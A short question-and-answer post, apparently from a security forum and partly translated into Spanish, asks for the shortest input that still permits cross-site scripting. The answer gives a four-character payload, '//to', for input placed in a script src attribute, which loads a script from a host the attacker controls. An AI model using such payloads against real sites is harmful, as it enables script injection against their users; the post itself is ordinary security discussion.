A veces te topas con campos de entrada que no escapan de la entrada de manera adecuada, pero que aún parecen ser demasiado cortos para ser usados para cualquier cosa maliciosa, al menos para alguien con mi imaginación limitada.
Esto me hizo preguntarme ¿cuál es el campo de entrada más corto posible que se puede usar para realizar un XSS malicioso?
Depende del contexto.
Una muy corta:
Context:
<script src="%XSS%"></script>
Let's say you are the owner/maintainer/administrator of http://.to (Tonga gTLD).
<script src="//to"></script>
XSS with 4 chars. Probably one of the shortest possible.
Hay docenas de otros contextos.
Editar:
Probado en Chrome 38.0.2125.122 (Mac OS X 10.8.5)
Lea otras preguntas en las etiquetas web-application xss